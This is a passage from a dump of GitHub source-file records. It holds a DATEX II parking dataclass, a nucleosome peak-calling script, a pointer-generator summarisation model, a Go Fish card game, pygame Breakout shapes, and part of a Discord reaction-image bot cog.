of parking spaces and groups of parking spaces.\n\n :ivar parking_space_or_group_identifier: A public identifier or\n short description for the parking space or group of parking\n spaces, for example \"6D\" or \"Truck parking west\".\n :ivar parking_floor_or_level: The floor or level of the parking site\n on which the assigned parking spaces are located.\n :ivar accessibility: Information on accessibility, easements and\n marking for handicapped people.\n :ivar parking_space_accessibility: Further easements for handicapped\n people related to this parking space or this group of parking\n spaces.\n :ivar parking_space_physics: Specifies 'driveThrough' or 'openAir'\n for the parking space or the group of parking spaces.\n :ivar parking_mode: The arrangement of the parking space or the\n group of parking spaces in relation to the road.\n :ivar parking_reservation: Indication of whether a parking\n reservation service is available and/or mandatory.\n :ivar maximum_parking_duration: The maximum parking duration for a\n parking record, a parking space or a group of parking spaces\n (e.g. to avoid overnight parking).\n :ivar distance_from_primary_road: Specifies the distance from the\n primary road in metres. Especially useful, if parking is located\n on a smaller type of road.\n :ivar parking_occupany_detection_type: Type of parking occupancy\n detection for a parking record, a parking space or a group of\n parking spaces, if any (balancing, single slot, ... ).\n :ivar parking_security: Specifies security measures related to the\n parking site or particular spaces.\n :ivar dedicated_access:\n :ivar only_assigned_parking: Parking is only allowed for the\n assignment given in this class, i.e. other assignments are not\n allowed. By using this role, it is not allowed to use\n 'assignedParkingAmongOthers' and 'prohibitedParking' for the\n same type of attributes.\n :ivar assigned_parking_among_others: Assignments for parking. Other\n assignments are allowed as well, i.e. the parking spaces are\n convenient for this kind of assignment.\n :ivar prohibited_parking: Parking is not allowed for the given\n assignment.\n :ivar parking_equipment_or_service_facility: Equiment, services and\n szenarios, which are directly related to the assigned parking\n space or parking space group. Note that the infrastructure index\n must be unique with respect to the Parking class' infrastrucure\n indeces\n :ivar parking_usage_scenario:\n :ivar parking_space_basics_extension:\n \"\"\"\n parking_space_or_group_identifier: Optional[MultilingualString] = field(\n default=None,\n metadata={\n \"name\": \"parkingSpaceOrGroupIdentifier\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_floor_or_level: Optional[int] = field(\n default=None,\n metadata={\n \"name\": \"parkingFloorOrLevel\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n accessibility: List[AccessibilityEnum] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_space_accessibility: List[ParkingSpaceAccessibilityEnum] = field(\n default_factory=list,\n metadata={\n \"name\": \"parkingSpaceAccessibility\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_space_physics: List[ParkingSpacePhysicsEnum] = field(\n default_factory=list,\n metadata={\n \"name\": \"parkingSpacePhysics\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n \"max_occurs\": 2,\n }\n )\n parking_mode: Optional[ParkingModeEnum] = field(\n default=None,\n metadata={\n \"name\": \"parkingMode\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_reservation: Optional[ReservationTypeEnum] = field(\n default=None,\n metadata={\n \"name\": \"parkingReservation\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n maximum_parking_duration: Optional[float] = field(\n default=None,\n metadata={\n \"name\": \"maximumParkingDuration\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n distance_from_primary_road: Optional[int] = field(\n default=None,\n metadata={\n \"name\": \"distanceFromPrimaryRoad\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_occupany_detection_type: List[OccupancyDetectionTypeEnum] = field(\n default_factory=list,\n metadata={\n \"name\": \"parkingOccupanyDetectionType\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_security: List[ParkingSecurityEnum] = field(\n default_factory=list,\n metadata={\n \"name\": \"parkingSecurity\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n dedicated_access: List[DedicatedAccess] = field(\n default_factory=list,\n metadata={\n \"name\": \"dedicatedAccess\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n only_assigned_parking: Optional[ParkingAssignment] = field(\n default=None,\n metadata={\n \"name\": \"onlyAssignedParking\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n assigned_parking_among_others: Optional[ParkingAssignment] = field(\n default=None,\n metadata={\n \"name\": \"assignedParkingAmongOthers\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n prohibited_parking: Optional[ParkingAssignment] = field(\n default=None,\n metadata={\n \"name\": \"prohibitedParking\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_equipment_or_service_facility: List[ParkingSpaceBasicsEquipmentOrServiceFacilityIndexParkingEquipmentOrServiceFacility] = field(\n default_factory=list,\n metadata={\n \"name\": \"parkingEquipmentOrServiceFacility\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_usage_scenario: List[ParkingSpaceBasicsScenarioIndexParkingUsageScenario] = field(\n default_factory=list,\n metadata={\n \"name\": \"parkingUsageScenario\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_space_basics_extension: Optional[ExtensionType] = field(\n default=None,\n metadata={\n \"name\": \"parkingSpaceBasicsExtension\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n","repo_name":"tefra/xsdata-samples","sub_path":"datexii/models/eu/datexii/v2/parking_space_basics.py","file_name":"parking_space_basics.py","file_ext":"py","file_size_in_byte":8907,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"19679759347","text":"from __future__ import print_function, division\nimport sys, os\nimport numpy as np\nimport pbcore.io as pb\nfrom Bio import Seq, SeqIO\nfrom tqdm import tqdm\nfrom scipy.signal import find_peaks\nimport pandas as pd\n\ndef callNucPeaks(npyf, refFile, sampname, heightcutoff=-10, windowsize=133):\n tipdms = np.load(npyf)\n \n for ir, record in enumerate(SeqIO.parse(refFile, 'fasta')):\n if ir > 0:\n raise InputError('Reference sequence has multiple entries')\n refseq = record.seq\n\n window = windowsize\n windowhalf = int((window-1)/2)\n #windmids = range(windowhalf, len(refseq)-windowhalf)\n\n peakdic = {'zmw':[], 'pos':[], 'height':[], 'prominence':[]}\n for izm in range(tipdms.shape[0]):\n rollingT = [np.nanmean(tipdms[izm, max(x-windowhalf,0):min(x+windowhalf+1,len(refseq))]) for x in range(0,len(refseq))]\n rollingT = np.asarray(rollingT)\n peaks, peakinf = find_peaks(-1 * rollingT, distance=147, height=heightcutoff, prominence=0.01)\n for ip, p in enumerate(peaks):\n peakdic['zmw'].append(izm)\n peakdic['pos'].append(peaks[ip])\n peakdic['height'].append(peakinf['peak_heights'][ip])\n peakdic['prominence'].append(peakinf['prominences'][ip])\n \n peakdf = pd.DataFrame(peakdic)\n peakdf.to_feather(sampname + '_peaks.feather')\n\n\ndef main():\n usenamepath = sys.argv[3] + '_' + sys.argv[4]\n print(usenamepath)\n heightparam = float(sys.argv[5]) if len(sys.argv) > 5 else -10\n windowparam = int(sys.argv[6]) if len(sys.argv) > 6 else 133\n callNucPeaks(sys.argv[1], sys.argv[2], usenamepath, heightparam)\n \n \nif __name__ == \"__main__\":\n # Usage: ./callNucPeaks.py [onlyTipd.npy] [reference.fasta] [cell] [sampleName]\n main()\n","repo_name":"RamaniLab/SAMOSA","sub_path":"callNucPeaks.py","file_name":"callNucPeaks.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"42479629147","text":"# -*- coding:utf-8 -*-\n# Created by Chen Qianqian\n\nimport tensorflow as tf\nfrom model_layers.layers import Encoder,BahdanauAttention,Decoder,Pointer\nfrom utils.params import get_params\nfrom utils.data_loader import load_embedding_matrix,Vocab\nimport random\n\n\n\nclass PGN(tf.keras.Model):\n def __init__(self,params,embedding_matrix,vocab):\n super(PGN, self).__init__()\n self.encoder = Encoder(params, embedding_matrix)\n self.attention = BahdanauAttention(params)\n self.decoder = Decoder(params, embedding_matrix)\n self.pointer = Pointer()\n self.batch_size = params['batch_size']\n self.max_enc_len = params['max_enc_len']\n self.use_scheduled_sampling = params['use_scheduled_sampling']\n self.vocab_size = params['vocab_size']\n self.mode = params['mode']\n self.vocab=vocab\n\n\n def call_encoder(self,inp):\n init_state = self.encoder.initial_state()\n output,state = self.encoder(inp,init_state)\n return output, state\n\n def call_decoder(self,dec_input,enc_output, dec_hidden, enc_pad_mask,prev_coverage,max_oov_len,extended_enc_inp):\n context_vector, attention_weight, prev_coverage = self.attention(enc_output, dec_hidden, enc_pad_mask,prev_coverage)\n prediction, dec_hidden = self.decoder(dec_input, dec_hidden, context_vector)\n print(prediction)\n p_gen = self.pointer(context_vector, dec_hidden, dec_input)\n final_dists = self.calc_final_dist(prediction, attention_weight, p_gen, max_oov_len, extended_enc_inp)\n final_dists = tf.stack(final_dists, 1)\n return final_dists\n\n\n def call(self,enc_output,dec_hidden,enc_pad_mask,dec_target,batch_oov_len,extended_enc_inp):\n predictions = []\n attentions = []\n p_gens = []\n coverages = [tf.zeros((self.batch_size, self.max_enc_len, 1))] # C0 = 0\n\n context_vector,attention_weights,coverage=self.attention(enc_output,dec_hidden,enc_pad_mask,prev_coverage=None)\n coverages.append(coverage)\n attentions.append(attention_weights)\n\n dec_input = tf.expand_dims([self.vocab.word2id['']] * self.batch_size, axis=1)\n\n for t in range(dec_target.shape[1]): # dec_input with and tokens, without \n prediction, dec_hidden = self.decoder(dec_input,dec_hidden,context_vector)\n p_gen = self.pointer(context_vector, dec_hidden, dec_input)\n\n predictions.append(prediction)\n p_gens.append(p_gen)\n\n context_vector, attention_weights, coverage=self.attention(enc_output,dec_hidden,enc_pad_mask,prev_coverage=coverage)\n coverages.append(coverage)\n attentions.append(attention_weights)\n\n\n if self.use_scheduled_sampling:\n cur_samp = random.uniform(0, 1)\n threshhold = tf.pow(0.95, t) # schedule_type: \"exponential\"\n if cur_samp < threshhold:\n dec_input = tf.expand_dims(dec_target[:, t], axis=1)\n else:\n dec_input = tf.expand_dims(prediction, axis=1)\n else:\n dec_input = tf.expand_dims(dec_target[:, t],axis=1) # Teacher forcing - feeding the target as the next input\n\n final_dists = self.calc_final_dist(predictions, attentions, p_gens, batch_oov_len, extended_enc_inp)\n\n\n if self.mode == 'train':\n return tf.stack(final_dists,axis=1), dec_hidden, attentions, coverages\n else:\n return tf.stack(final_dists,axis=1), dec_hidden, context_vector,tf.stack(attentions,1), tf.stack(p_gens,1)\n\n\n def calc_final_dist(self,predictions, attentions, p_gens, batch_oov_len, extended_enc_inp):\n '''\n Get the final distribution\n :param predictions.shape (max_dec_len,batch_size,vocab_size)\n :param attentions.shape (max_dec_len+1,batch_size,max_enc_len)\n :param p_gens.shape (max_dec_len,batch_size,1)\n :param batch_oov_len.shape (batch_size,)\n :param extended_enc_inp.shape (batch_size,max_enc_len)\n '''\n vocab_dists = [p_gen * predict for (p_gen,predict) in zip(p_gens,predictions)] # vocab_dists.shape (max_dec_len-1,batch_size,vocab_size)\n attn_dists = [(1-p_gen) * attn for (p_gen,attn) in zip (p_gens,attentions[:-1])]\n\n # Concatenate some zeros to each vocabulary dist,to hold the probabilities for in_articel OOV words\n batch_oov_len = tf.math.reduce_max(batch_oov_len,axis=-1).numpy()\n extended_size = self.vocab_size + batch_oov_len\n extra_zeros = tf.zeros((self.batch_size,batch_oov_len))\n vocab_dists_extended = [tf.concat([dist,extra_zeros],axis=1) for dist in vocab_dists] # vocab_dists_extended.shape (max_dec_len,batch_size,extended_size)\n\n # Project the values in the attention distributions onto the appropriate entries in the final distributions.\n batch_nums = tf.range(0,limit=self.batch_size)\n batch_nums = tf.expand_dims(batch_nums,axis=1) # batch_nums.shape (batch_size,1)\n attn_len = tf.shape(extended_enc_inp)[1]\n batch_nums = tf.tile(batch_nums,[1,attn_len]) # batch_nums.shape (batch_size,max_enc_len)\n indices = tf.stack((batch_nums,extended_enc_inp),axis=2) # indices.shape (batch_size,max_enc_len,2)\n shape = [self.batch_size,extended_size]\n attn_dists_projected = [tf.scatter_nd(indices,copy_dist,shape) for copy_dist in attn_dists]\n final_dists = [vocab_dist + copy_dist for (vocab_dist, copy_dist) in zip(vocab_dists_extended, attn_dists_projected)]\n\n return final_dists # final_dists.shape (max_dec_len,batch_size,extended_size)\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n params=get_params()\n embedding_matrix=load_embedding_matrix()\n vocab=Vocab()\n pgn=PGN(params,embedding_matrix,vocab)","repo_name":"qchenwhy006/Car-diagnostic-report-analysis-Chinese-Version-","sub_path":"model_layers/PGN_Coverage.py","file_name":"PGN_Coverage.py","file_ext":"py","file_size_in_byte":5814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"13610863796","text":"from src.GoFish import Deck\nfrom src.GoFish.player import *\nimport random\n#march 17\ndef RepresentsInt(s):\n try:\n int(s)\n return True\n except ValueError:\n return False\n\nclass Game():\n def __init__(self, players, computers):\n self.maxplayers = 4\n if (players + computers) > self.maxplayers:\n raise Exception(\"There can only be \" + str(self.maxplayers) + \" players\")\n if (players + computers) <= 1:\n raise Exception(\"Must have at least 2 players\")\n self.players = []\n self.deck = Deck.deck(True)\n # print (len(self.deck.facedown))\n # for card in self.deck.facedown:\n # print(card.value)\n # print(card.suit)\n self.inPlay = True\n\n\nclass GoFish(Game):\n def __init__(self, players, computers):\n print('Welcome to GoooooooooFish')\n print('---------------------------------------------------------------')\n super().__init__(players, computers)\n for i in range(0, players):\n self.players.append(GoFishPlayer(False, i, 0))\n for i in range(0, computers):\n self.players.append(GoFishPlayer(True, i, 0))\n self.playerCount = len(self.players)\n\n def getPlayerChoicesAndPrint(self, player):\n choicesDic = {}\n iterator = 1\n for p in self.players:\n if not p.__eq__(player):\n choicesDic[iterator] = p\n iterator += 1\n\n for k in choicesDic.keys():\n print(str(k) + ' ' + choicesDic[k].name)\n\n return choicesDic\n\n def ask(self, player, otherPlayer, cardRank):\n print('Asking ' + otherPlayer.name + ' for card...')\n if otherPlayer.checkForCardByRank(cardRank):\n cardsReceived = otherPlayer.giveUpAllCardsByRank(cardRank)\n for c in cardsReceived:\n player.hand.append(c)\n print(\"Player \" + otherPlayer.name + \" has given you \" + str(len(cardsReceived)) + \" of Rank \" + str(cardRank.name))\n else:\n print(\"Player \" + otherPlayer.name + \" does not have the card you asked for. Go fish!\")\n drawn = self.deck.drawCardFromTopOfDeck()\n player.hand.append(drawn)\n print(\"You have drawn \" + drawn.value.name + ' of ' + drawn.suit.name + \" from the deck.\")\n\n def computerTurn(self, player):\n turnString = '\\n' + player.name + '\\'s turn'\n print(turnString)\n print('********************************')\n if player.isEmptyHand():\n print(\"You have no cards to play! Drawing one card from the top of the deck...\")\n player.hand.append(self.deck.drawCardFromTopOfDeck())\n player.displayHand()\n print(\"Which card would you like to ask for? (Please type the number beside the card you want to ask for (Ex: 1))\")\n print('>')\n want = player.computerPickACard()\n print(\"Who would you like to ask? (Please type a number)\")\n otherPlayers = self.getPlayerChoicesAndPrint(player)\n print('>')\n who = random.randint(1, len(self.players) - 1)\n # error checking\n otherPlayer = otherPlayers[who]\n self.ask(player, otherPlayer, want)\n player.sortHandByRank()\n\n # removes any books in hand\n player.checkForBook()\n\n # Empty deck: END OF GAME\n if self.deck.isEmpty():\n print(\"The draw pile is now empty.\")\n self.inPlay = False\n\n # find players' max number of books\n max = 0\n winners = []\n for i in range(self.playerCount):\n if self.players[i].num_books > max:\n max = self.players[i].num_books\n # check for a tie\n for i in range(self.playerCount):\n if self.players[i].num_books == max:\n winners.append(self.players[i])\n #announce the winner(s)\n names = []\n for w in winners:\n names.append(w.name)\n print(str(names) + \" have \" + str(max) + \" book(s). \" + str(names) + \" win!\")\n\n def turn(self, player):\n turnString = '\\n' + player.name + '\\'s turn'\n print(turnString)\n print('********************************')\n if player.isEmptyHand():\n print(\"You have no cards to play! Drawing one card from the top of the deck...\")\n player.hand.append(self.deck.drawCardFromTopOfDeck())\n player.displayHand()\n print(\"Which card would you like to ask for? (Please type the number beside the card you want to ask for (Ex: 1))\")\n print('>')\n want = sys.stdin.readline()\n while not RepresentsInt(want):\n print('input must be numeric value...try again\\n>')\n want = sys.stdin.readline()\n want = int(want)\n while (want < 1) or (want > len(player.hand)):\n print('choice must be a card that is in your hand')\n while not RepresentsInt(want):\n print('input must be numeric value...try again\\n>')\n want = sys.stdin.readline()\n want = int(want)\n want = player.hand[want - 1].value\n print(\"Who would you like to ask? (Please type a number)\")\n otherPlayers = self.getPlayerChoicesAndPrint(player)\n print('>')\n who = sys.stdin.readline()\n while not RepresentsInt(who):\n print('input must be numeric value...try again\\n>')\n who = sys.stdin.readline()\n who = int(who)\n # error checking\n while who not in otherPlayers.keys():\n print(\"Invalid player. Please enter the number of the player you would like to ask.\")\n print('>')\n who = sys.stdin.readline()\n while not RepresentsInt(who):\n print('input must be numeric value...try again\\n>')\n who = sys.stdin.readline()\n who = int(who)\n otherPlayer = otherPlayers[who]\n self.ask(player, otherPlayer, want)\n player.sortHandByRank()\n\n # removes any books in hand\n player.checkForBook()\n\n # Empty deck: END OF GAME\n if self.deck.isEmpty():\n print(\"The draw pile is now empty.\")\n self.inPlay = False\n\n # find players' max number of books\n max = 0\n winners = []\n for i in range(self.playerCount):\n if self.players[i].num_books > max:\n max = self.players[i].num_books\n # check for a tie\n for i in range(self.playerCount):\n if self.players[i].num_books == max:\n winners.append(self.players[i])\n #announce the winner(s)\n names = []\n for w in winners:\n names.append(w.name)\n print(str(names) + \" have \" + str(max) + \" book(s). \" + str(names) + \" win!\")\n else:\n print('Your hand is now:')\n player.displayHand()\n\n\n def run(self):\n # Deal cards\n for i in range(self.playerCount):\n for j in range(5): # each player gets 5 cards\n self.players[i].hand.append(self.deck.drawCardFromTopOfDeck())\n\n for p in self.players:\n p.sortHandByRank()\n while self.inPlay:\n for i in range(self.playerCount):\n if self.players[i].ai:\n self.computerTurn(self.players[i])\n else:\n self.turn(self.players[i])\n if not self.inPlay:\n return self.players[i]\n","repo_name":"gtstewar/CSC495","sub_path":"src/GoFish/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":7612,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"12666211197","text":"import pygame\n\nclass Shape():\n def __init__(self, xvalue, yvalue, width, height, color=None):\n if color == None:\n self._color = (255,255,255)\n else:\n self._color = color\n self._shape = pygame.Rect(xvalue,yvalue,width,height)\n\n\n #Defualt draw\n def draw(self, screen):\n pygame.draw.rect(screen,self._color,self._shape)\n\n\nclass Ball(Shape):\n BALL_VELOCITY = 5\n def __init__(self, xvalue, yvalue, width, height, color=None):\n self._velocity = [0,0]\n super().__init__(xvalue,yvalue,width,height,color)\n\n def start_velocity(self):\n self._velocity = [-self.BALL_VELOCITY, -self.BALL_VELOCITY]\n\n #Override draw to draw a circle\n def draw(self, screen):\n pygame.draw.circle(screen,self._color,(self._shape.centerx,self._shape.centery),int(self._shape.width/2))\n\n def xvelocity(self):\n return self._velocity[0]\n\n def yvelocity(self):\n return self._velocity[1]\n\n # Add a function called update_xvelocity(xvelocity) that updates the balls xvelocity with the given value\n def update_xvelocity(self, xvelocity):\n self._velocity[0]= xvelocity\n # Add a function called update_yvelocity(yvelocity) that updates the balls yvelocity with the given value\n def update_yvelocity(self, yvelocity):\n self._velocity[1]= yvelocity\n\n #Create an update_position method that changes the xvalue and yvalue of the ball based on the velocity\n def update_position(self, position = None):\n if position == None:\n self._shape = self._shape.move(self._velocity[0],self._velocity[1])\n else:\n self._shape.left = position[0]\n self._shape.top = position[1]\n\n def update_positionx(self, x = None):\n if x == None:\n self._shape = self._shape.move(self._velocity[0], 0)\n else:\n self._shape = self._shape.move(x, 0)\n\n def update_positiony(self, y = None):\n if y == None:\n self._shape = self._shape.move(0, self._velocity[1])\n else:\n self._shape = self._shape.move(0, y)\n\n def _check_collision_shape(self,brick):\n return (brick._shape.top <= self._shape.top <= brick._shape.bottom or brick._shape.top <= self._shape.bottom <= brick._shape.bottom)and (brick._shape.left <= self._shape.right <= brick._shape.right or brick._shape.left <= self._shape.left <= brick._shape.right)\n\n def checkhandle_collision_brickx(self,brick):\n if brick._shape.top <= self._shape.top <= brick._shape.bottom or brick._shape.top <= self._shape.bottom <= brick._shape.bottom:\n #hit from left\n if brick._shape.left <= self._shape.right <= brick._shape.right:\n self.update_xvelocity(self.xvelocity()*-1)\n self._shape.right = brick._shape.left-1\n return True\n #hit from right\n elif brick._shape.left <= self._shape.left <= brick._shape.right:\n self.update_xvelocity(self.xvelocity() * -1)\n self._shape.left = brick._shape.right + 1\n return True\n return False\n\n def checkhandle_collision_bricky(self,brick):\n if brick._shape.left <= self._shape.right <= brick._shape.right or brick._shape.left <= self._shape.left <= brick._shape.right:\n #Hit from Bottom\n if brick._shape.top <= self._shape.top <= brick._shape.bottom:\n self.update_yvelocity(self.yvelocity()*-1)\n self._shape.top = brick._shape.bottom+1\n return True\n #Hit from Top\n if brick._shape.top <= self._shape.bottom <= brick._shape.bottom:\n self.update_yvelocity(self.yvelocity() * -1)\n self._shape.bottom = brick._shape.top - 1\n return True\n return False\n\n\n def checkhandle_collision_paddley(self, paddle):\n #Check to see if ball can hit paddle\n if self._shape.bottom >= paddle._shape.top >= self._shape.top:\n if paddle._shape.left <= self._shape.right <= paddle._shape.right or paddle._shape.left <= self._shape.left <= paddle._shape.right:\n self._shape.bottom = paddle._shape.top +1\n self.update_yvelocity(self.yvelocity() * -1)\n # Update x velocity based of where ball hit paddle\n x = self._shape.centerx - paddle._shape.centerx\n xvelocitychange = (x* self.BALL_VELOCITY)/(paddle._shape.width/2)\n xvelocitychange = round(xvelocitychange)\n self.update_xvelocity(self.xvelocity()+ int(xvelocitychange))\n\n def checkhandle_collision_wallx(self, x):\n #Modify Method to return true if ball hits the bottom of the screen else false\n if self._shape.left <= 0:\n self._shape.left = 1\n self.update_xvelocity(self._velocity[0]*-1)\n elif self._shape.right >= x:\n self._shape.right = x - 1\n self.update_xvelocity(self._velocity[0]*-1)\n\n def checkhandle_collision_wally(self,y):\n if self._shape.top <= 0:\n self._shape.top = 1\n self.update_yvelocity(self._velocity[1]*-1)\n elif self._shape.bottom >= y:\n return True\n\n return False\n\n\nclass Paddle(Shape):\n #Create a update_position method for the paddle that takes in an xchange value and calls self.shape.move(xchange, 0)\n def update_position(self, xchange, window_width):\n if xchange + self._shape.left < 0 :\n self._shape.left = 0\n elif xchange + self._shape.right > window_width:\n self._shape.right = window_width\n else:\n self._shape = self._shape.move(xchange,0)\n","repo_name":"calvinkranig/breakout","sub_path":"MainGame/shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41476643896","text":"#!/usr/bin/env python3\n\n\"\"\"Contains a cog for various weeb reaction commands.\"\"\"\n\n# Standard modules\nimport logging\nimport random\n\n# Third-party modules\nimport discord\nfrom discord.ext import commands\n\n# Bundled modules\nimport checks\nimport helpers\nimport utils\n\nlogger = logging.getLogger(__name__)\n\nsystemrandom = random.SystemRandom()\n\n# Base URL strings for RRA API.\nBASE_URL_API = \"https://rra.ram.moe/i/r?type={0}\"\nBASE_URL_IMAGE = \"https://cdn.ram.moe{0[path]}\"\n\n# Single image links.\nIMAGE_FACEDESK = \"https://media.tumblr.com/tumblr_lqegp8wjxZ1qktqch.gif\"\nIMAGE_LMLU = \"https://68.media.tumblr.com/tumblr_mej070O7Lj1qktqch.gif\"\nIMAGE_WLOL = \"https://68.media.tumblr.com/tumblr_lqehb0eOK01qktqch.jpg\"\n\n# Tuples of image links.\nIMAGES_BOOTS = ((\"https://media-cache-ak0.pinimg.com/736x/db/b9/a3/\"\n \"dbb9a30cc312682ee2d2cc4cf84310ae.jpg\"),\n \"https://www.polyvore.com/cgi/img-thing?.out=jpg&size=l&tid=21163978\",\n \"https://i.imgur.com/3Y4r38i.jpg\",\n \"https://i.imgur.com/Jj0eZTh.png\",\n \"https://i.imgur.com/EC4UXCI.jpg\")\nIMAGES_DEAD = ((\"https://s-media-cache-ak0.pinimg.com/736x/ec/61/ef/\"\n \"ec61ef110a5d2e01bf8ae48331b63723.jpg\"),\n \"http://safebooru.org/images/2048/60ce6f6888ba2fce6393638223dcc8d7c67f0655.jpg\",\n \"https://i.giphy.com/xT1XGLm7CJknNZKVS8.gif\")\nIMAGES_GLOMP = (\"http://safebooru.org/images/1575/8e2b95aefa17208aa5b5bc2aa687a8d791adf20a.gif\",\n \"http://safebooru.org/images/1860/e8562c569fb94477671947ad96a0b88ac999569a.gif\",\n \"http://safebooru.org/images/579/cd1913e6aaa91bb3abb752ebd9fb410099396acd.gif\",\n (\"http://safebooru.org/samples/2095/\"\n \"sample_c1fc61605ea086c339d0b8376efbfb83003d1a96.jpg\"))\nIMAGES_IDK = (\"http://safebooru.org/images/1513/6198de35cc3a7ffb2bd5cd46a89ca91fb117b3db.gif\",\n \"http://safebooru.org/images/2098/bbe8b8f0fc5b630133d10a16bbeb29b81d64db50.jpg\",\n \"http://safebooru.org/images/1977/e3988fa3bb6125f77b8e55d648ab1aebdd317bc7.jpg\",\n \"http://safebooru.org/samples/1768/sample_2bf2f0acc1c06e34deef043066ebb17c21de4238.jpg\",\n \"http://safebooru.org/images/937/ae704e58e0d58ddf57d3793609f9994a2b831301.jpg\")\nIMAGES_WAGGING = (\"http://safebooru.org/images/146/78639fe8edd6cb75a0f031b4dfb0773fdda6b4e8.jpg\",\n \"http://safebooru.org/images/763/2136ae257bb49f34552070d566b9eb23884a48c4.jpg\",\n \"http://safebooru.org/images/599/7fc582995b8fa21555791bfed382f0f634ca3cbb.jpg\",\n \"http://safebooru.org/images/275/3c5368c8f7bd3795052ce38ae860c9fa4b97f473.gif\",\n \"http://safebooru.org/images/1990/96b8cf2274c20df69c3ba04d4a3a6647cb07a3f0.gif\",\n \"http://safebooru.org/images/824/c271151ac920b664ed4de06d9770199f6d16d70f.gif\",\n \"http://safebooru.org/images/906/fae7d69ba34b74795546d58b322d33189fce8418.gif\",\n \"http://safebooru.org/images/1428/f5bcb191dfdd0881db66eb676b9f42df214629b0.gif\",\n \"http://safebooru.org/images/1891/5922d9fe102f8b2e62b2761eb505ee75fdcde2df.gif\",\n \"http://safebooru.org/images/1853/10962bdb8ffeda856e15882593788cd09e58ee2e.gif\",\n (\"http://68.media.tumblr.com/01e9cc48310fbe72b2ccf1b52925d0c4/\"\n \"tumblr_o3at2et2G31tydz8to1_540.gif\"),\n (\"https://lh3.googleusercontent.com/-rrPLI80iYmw/VQbtiyQhFwI/\"\n \"AAAAAAAA9Pg/XUGGf7yT6CY/w500-h273/tumblr_mmeanbZFmO1qg78wpo1_500.gif\"),\n (\"http://24.media.tumblr.com/a1d0298a6c2e7821ed102ad2345fcc4a/\"\n \"tumblr_myauniO7nO1r0wlweo1_500.gif\"),\n \"http://i.imgur.com/MSCtuve.gif\",\n (\"https://38.media.tumblr.com/8203abcf4aef7f528eb61206710bfdce/\"\n \"tumblr_nnwn56DQuR1ty38iao1_400.gif\"),\n (\"https://68.media.tumblr.com/c54e506582785a3e89d223fa3dba2fd6/\"\n \"tumblr_nyman1FuBi1tydz8to1_500.gif\"))\nIMAGES_LEWD = (\"https://i.imgur.com/5JZH78a.jpg\",\n \"https://i.imgur.com/RdQ3FFA.jpg\",\n \"https://i.imgur.com/98tad3K.gif\",\n \"https://i.imgur.com/8Dd399u.gif\",\n \"https://i.imgur.com/NbZ5Wgo.png\",\n \"https://i.imgur.com/aFHmenc.gif\",\n \"https://i.imgur.com/OsckzUL.png\",\n \"https://i.imgur.com/3EZyiLQ.jpg\",\n \"https://i.imgur.com/AaZvqcF.jpg\",\n \"https://i.imgur.com/XzQRDDl.jpg\",\n \"https://i.imgur.com/GTfWFm6.jpg\",\n \"https://i.imgur.com/Iz315vJ.jpg\",\n \"https://i.imgur.com/rWLoIzf.png\",\n \"https://secure.static.tumblr.com/753b4405d4c926ef8224e3ac5ec30aef/f52giag/4Uin6xuha/tumblr_static_tumblr_static_2p47ogg0mhus4gs8skwwcc8sw_640.gif\")\nIMAGES_LICK = (\"http://safebooru.org/images/189/0a412d1db7f53cd2505df9cf16be693dcac0855b.jpeg\",\n \"http://safebooru.org/images/358/f64d461f47319d8dae9adb899c0de24fca70127d.png\",\n \"http://safebooru.org/images/2116/4b8cf6a3f4cd38a610697df4f0fe1074e67070af.jpg\")\nIMAGES_POKE = (\"http://safebooru.org/images/1880/e3b020472d86b0a04ffec8cdf41049ef66cf3a68.gif\",\n \"http://safebooru.org/images/2051/031566980728255e6d7e2fba8c12a3c38ea7598a.gif\",\n \"http://safebooru.org/images/1169/3edae332d38c887a8723207d1bc0dffac8244591.gif\")\nIMAGES_SANDWICHES = (\"https://i.imgur.com/kyTDwIX.png\",\n \"https://i.imgur.com/ULKlVhU.png\",\n \"https://i.imgur.com/Z2RvlBx.png\",\n \"https://i.imgur.com/k5GnTbU.png\",\n \"https://i.imgur.com/SzuegH9.png\",\n 